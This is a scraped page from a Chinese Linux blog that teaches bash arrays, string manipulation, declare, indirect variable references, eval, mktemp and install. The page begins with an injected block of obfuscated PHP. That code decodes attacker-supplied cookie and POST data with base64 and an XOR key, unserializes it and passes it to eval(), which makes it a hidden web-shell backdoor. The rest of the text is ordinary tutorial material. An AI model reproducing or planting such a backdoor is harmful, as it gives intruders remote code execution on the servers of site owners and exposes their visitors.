$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 数组详解 | Linux运维部落

数组详解

数组

变量:存储单个元素的内存空间
数组:存储多个元素的连续的内存空间,相当于多个变量的集合
    
    数组名:整个数组只有一个名字
    数组索引:编号从0开始,属于数值索引
        数组名[索引],
        ${ARRAY_NAME[INDEX]}
    
    要注意的是bash-4以及之后的版本支持自定义索引格式,而不仅仅是0,1,2,3...数字格式
        此类数组称之为”关联数组“

声明数组:

declare -a NAME :声明索引数组    declare -A NAME  :声明关联数组
        关联数组必须先声明后使用

数组中元素的赋值方式:

(1)一次只赋值一个元素        
    ARRAY_NAME[INDEX]=VALUE
            [root@localhost fun]# tianshi[0]="datianshi"
            [root@localhost fun]# tianshi[1]="xiaotianshi"
            [root@localhost fun]# tianshi[2]="heitianshi"

(2)一次赋值全部元素        
    ARRAY_NAME=(“VAL1“ ”VAL2“ ”VAL3“...)
           (1) [root@localhost fun]# tianshi=("datianshi" "xiaotianshi" "heitianshi")
           (2)[root@localhost fun]# file=(/root/*)
           (3) [root@localhost fun]# file=(`ls /root/`) 
                

(3)只赋值特定元素        
    ARRAY_NAME=([0]="val1" [3]="val4"...)
            [root@localhost fun]# tianshi=([0]="datianshi" [2]="heitianshi")
        注意:bash支持稀疏格式的数组
(4)read -a ARRAY_NAME
            [root@localhost fun]# read -a tianshi
            datianshi heitianshi xiaotianshi
            [root@localhost fun]# echo ${tianshi[*]}
            datianshi heitianshi xiaotianshi

数组引用

引用数组中的元素:
    ${ARRAY_NAME[INDEx]}
    注意:引用时,只给数组名,表示引用下标为0的元素。   
    ${ARRAY_NAME[*]}:引用数组中的所有元素    
    ${ARRAY_NAME[@]}:引用数组中的所有元素
数组的长度(数组中元素的个数):    
    ${#ARRAY_NAME[*]}
    ${#ARRAY_NAME[@]}
        [root@localhost ~]# haochide[0]=baozi
        [root@localhost ~]# haochide[1]=hongshaorou
        [root@localhost ~]# haochide[2]=gongbaojiding
        [root@localhost ~]# haochide[3]=jiangzhouzi
        [root@localhost ~]# echo ${#haochide[@]}
        4
        [root@localhost ~]# echo ${#haochide[*]}
        4

数组元素切片:

${ARRAY_NAME[@]:offset:number}        
        offset:要跳过的元素个数        
        number:要取出的元素个数
            省略number的话是表示偏移量之后的所有元素
        [root@localhost ~]# echo ${haochide[@]:1:2}
        hongshaorou gongbaojiding
        [root@localhost ~]# echo ${haochide[@]:1}
        hongshaorou gongbaojiding jiangzhouzi
向非稀疏数组中追加元素:
    ARRAY_NAME[${#ARRAY_NAME[*]}]=VALUE
    删除数组中的元素:
    unset ARRAY[INDEx]
        [root@localhost ~]# unset haochide[3]
        [root@localhost ~]# echo ${haochide[3]}
        
        [root@localhost ~]# echo ${haochide[2]}
        gongbaojiding
        [root@localhost ~]#
关联数组:
    declare -A ARRAY_NAME
        ARRAY_NAME=([index_name1]="value1" [index_name2]="value2"...)

bash的内置字符串处理工具:

${#var}:返回字符串变量var的长度
        
        [root@localhost ~]# echo ${var[*]}
        abcdefghijklmnopqrstuvwxyz
        [root@localhost ~]# echo ${#var}
        26

字符串切片:

${var:offset:number}
            取字符串的子串
                [root@localhost ~]# echo ${var:3:5}
                defgh

            取字符的最右侧的几个字符:${var: -length}::冒号后面跟一个空格
                [root@localhost ~]# echo ${var: -5}
                vwxyz
            两个结合使用的话就是跳过offset所包括的字符,到去掉-length的字符
                [root@localhost ~]# echo ${var:5: -5}
                fghijklmnopqrstu

基于模式取字符串:

${var#*word}:其中Word是指定的分隔符:
        功能:自左而右,查找var变量所存储的字符串中,第一次出现的Word分隔符,删除字符串开头至此分隔符之间的所有字符;
            [root@localhost ~]# echo ${var#*h}
            ijklmnopqrstuvwxyz

${var##*word}:其中Word是指定的分隔符:
        功能:自左而右,查找var变量所存储的字符串中,最后一次出现的Word分隔符,删除字符串开头至此分隔符之间的所有字符;
        [root@localhost ~]# echo $var
        abcdefgfggggggfadvk
        [root@localhost ~]# echo ${var##*f}
        advk
        
        可以用这个方法取基名:
            [root@localhost ~]# file="/etc/init.d/functions"
            [root@localhost ~]# echo ${file##*/}
            functions
${var%word*}:其中Word是指定的分隔符:
        功能:自右而左,查找var变量所存储的字符串中,第一次出现的Word分隔符,删除字符串尾部至此分隔符之间的所有字符;
    
${var%word*}:其中Word是指定的分隔符:
        功能:自右而左,查找var变量所存储的字符串中,最后一次出现的Word分隔符,删除字符串尾部至此分隔符之间的所有字符;

查找替换:

${var/PATTERN/SUBSTI}:查找var所表示的字符串中,第一次被PATTERN所匹配到的字符串,将其替换为SUBSTI所表示的字符串;
        
        [root@localhost ~]# echo $mantou
        maozidacongyoumodacongdoubanjiangdacong
        [root@localhost ~]# echo ${mantou/dacong/yangcong}
        maoziyangcongyoumodacongdoubanjiangdacong

${var//PATTERN/SUBSTI}:查找var所表示的字符串中,所有被PATTERN所匹配到的字符串,将其全部替换为SUBSTI所表示的字符串;
   
    [root@localhost ~]# echo $mantou
    maozidacongyoumodacongdoubanjiangdacong
    [root@localhost ~]# echo ${mantou//dacong/yangcong}
    maoziyangcongyoumoyangcongdoubanjiangyangcong

${var/#PATTERN/SUBSTI}:查找var所表示的字符串中,行首被PATTERN所匹配到的字符串,将其替换为SUBSTI所表示的字符串;
    
    [root@localhost ~]# echo ${mantou/#maozi/baozi}
    baozidacongyoumodacongdoubanjiangdacong

${var/%PATTERN/SUBSTI}:查找var所表示的字符串中,行尾被PATTERN所匹配到的字符串,将其替换为SUBSTI所表示的字符串;
    
    [root@localhost ~]# echo ${mantou/%dacong/dasuan}
    maozidacongyoumodacongdoubanjiangdasuan

注意:PATTERN中使用glob风格的通配符

    [root@localhost ~]# echo ${mantou/maozi*youmo/dasuan}
    dasuandacongdoubanjiangdacong
        
    查找删除:
        ${var/PATTERN}::以PATTERN为模式查找var字符串中第一次匹配到的字符,并删除;
        ${var//PATTERN}:以PATTERN为模式查找var字符串中所有匹配到的字符,并删除;
        ${var/#PATTERN}
        ${var/%PATTERN}
        
    字符大小写转换:
        ${var^^}:把var中的所有小写字符转换为大写;
        ${var,,}:把var中的所有大写字符转换为小写;
        
        
    变量赋值:
        ${var:-VALUE}:如果变量var为空或未设置,那么返回value;否则返回var变量的值;
        ${var:=VALUE}:如果变量var为空或未设置,那么返回value,并将VALUE赋给var;否则返回var变量的值;
        ${var:+VALUE}:如果var变量不空,则返回value;
        ${var:?ERROR_INFO}:如果var为空,或未设定,那么返回ERROR_INFO为错误提示;否则,返回var值;

高级变量用法-有类型变量

Shell 变量一般是无类型的,但是bash Shell 提供了declare和typeset两个命令用于指定变量的类型,两个命令是完全等价的

 declare [ 选项]  变量名
    -r  将变量设置为只读属性    -i  将变量定义为整型数    -a  将变量定义为数组    -f  显示此脚本前定义过的所有函数名及其内容    -F  仅显示此脚本前定义过的所有函数名    -x  将变量声明为环境变量    -l 将变量值转为小写字母    -u 将变量值转为大写字母

间接变量引用

如果第一个变量的值是第二个变量的名字,从第一个变量引用第二个变量的值就称为间接变量引用
variable1=variable2
variable2=value
variable1的值是variable2,而variable2又是变量名,
variable2的值为value,间接变量引用是指通过variable1获得变量值value的行为

bash Shell 提供了两种格式实现间接变量引用    eval tempvar=\$$variable1
    tempvar=${!variable1}
    
示例:
    [root@localhost tmp]# v1=v2
    [root@localhost tmp]# v2=nihaoa
    [root@localhost tmp]# eval v3=\$$v1
    [root@localhost tmp]# echo $v3
    nihaoa
    [root@localhost tmp]# echo ${!v1}
    nihaoa

eval 命令

eval 命令将会首先扫描命令行中所有的变量然后进行所有变量的置换,然后再执行该命令。该命令适用于那些一次扫描无法实现其功能的变量。该命令对变量进行两次扫描。

  示例:
    [root@localhost tmp]# a=whoami
    [root@localhost tmp]# echo $a
    whoami
    [root@localhost tmp]# `echo $a`
    root
    [root@localhost tmp]# eval $a
    root

创建临时文件

mktemp命令:
    创建的临时文件可避免冲突

mktemp [OPTION]... [TEMPLATE]
    TEMPLATE: filename.XXX
    X 至少要出现三个
    
OPTION: :
    -d:  创建临时目录
    -p DIR或--tmpdir=DIR:指明临时文件所存放目录位置
   
示 例 :    
    #mktemp /tmp/test.XXX
    #tmpdir=`mktemp –d /tmp/testdir.XXX`    
    #mktemp --tmpdir=/testdir test.XXXXXX

安装复制文件

install 命令:    
    install [OPTION]... [-T] SOURCE DEST 单文件    
    install [OPTION]... SOURCE... DIRECTORY
    install [OPTION]... -t DIRECTORY SOURCE...    
    install [OPTION]... -d DIRECTORY...创建空目录
    
选项:
    -m MODE ,默认755
    -o OWNER
    -g GROUP

bash 如何展开命令行

把命令行分成单个命令词
展开别名
展开大括号种的声明({}) )
展开波浪符声明(~) )
命令替换$() 和 ``) )
再次把命令行分成命令词
展开文件通配(* 、? 、[abc] 等等)
准备I/0 重导向(< 、>) )
运行命令



反斜线(\ )会使随后的字符按原意解释
    $ echo Your cost: \$5.00
    Your cost: $5.00加引号来防止扩展
    •  单引号(’ )防止所有扩展
    •  双引号(”)也防止所有扩展,但是以下情况例外:
    $ (美元符号) - 变量扩展
    ` (反引号) - 命令替换
    \ (反斜线) - 禁止单个字符扩展
    ! (叹号) - 历史命令替换
    
  作业:
      输入若干个数值存入数组中,采用冒泡算法进行升序或降序排序

1 (1).jpg

1 (2).jpg

运行后结果是:

1 (3).jpg

原创文章,作者:dxkboke,如若转载,请注明出处:http://www.178linux.com/39703

(1)
上一篇 2016-08-24 21:22
下一篇 2016-08-24 21:22

相关推荐

  • 初识linux文件管理

    初识linux文件管理 1.文件系统与目录结构 文件系统从根目录 下开始,用“/”。 以. 开头的文件为隐藏文件,路径分隔用/表示。文件系统的层级结构是LSB(linux standard base),遵循文件系统层级标准(FHS ) 文件命名规则:   文件名最长255个字节,包括路径名在内共4095个字节  &nb…

    2017-02-18
  • Linux常见发行版本以及Linux哲学思想

    什么是Linux?  Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软件、应用程序和网络协议。它支持32位和64位硬件。Linux继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统。  Linux操作系…

    Linux干货 2016-08-15
  • 高可用keepalived结合haproxy代理WordPress(动静分离)

    (1)A  B两台服务器做keepalived高可用,同时作为haproxy动静分离后端代理。         (keepalived时主备模型,haproxy轮询调度) (2)C 服务器搭建apache作为动态资源服务器 (3)D 服务器搭建nginx作为静态资源服务器 (4)VIP:172.18.0.42…

    2017-05-20
  • PHP5.4最新特性

    原文Oracle:LAMP 体系有了新的竞争,但此版本中的特性使 PHP 再次挑战极限。 稍微做了修改。: 概述总结:1. 内存和性能改进:大型 PHP 应用程序中可节省 20-50% 的内存。通过各种优化使性能提高 10-30%2. 支持特性Trait3. 精简数组语法,可以定义短数组4. 函数数组解除引用,支持Array dereferenci…

    Linux干货 2015-11-18
  • 文本处理工具sed

    处理文本的工具sed Stream EDitor,  行编辑器     sed 是一种流编辑器,它一次处理一行内容。处理时,把     当前处理的行存储在临时缓冲区中,称为“模式空间”(     pa…

    Linux干货 2016-08-10
  • 文件系统挂载

    文件系统挂载 文件系统管理: 将额外文件系统与根文件系统某现存的目录建立起关联关系,进而使得此目录做为其它文件访问入口的行为称之为挂载;  解除此关联关系的过程称之为卸载;  把设备关联挂载点:Mount Point mount  卸载时:可使用设备,也可以使用挂载点 umount  注意:挂载点下原有文件在挂载完成后…

    Linux干货 2015-12-16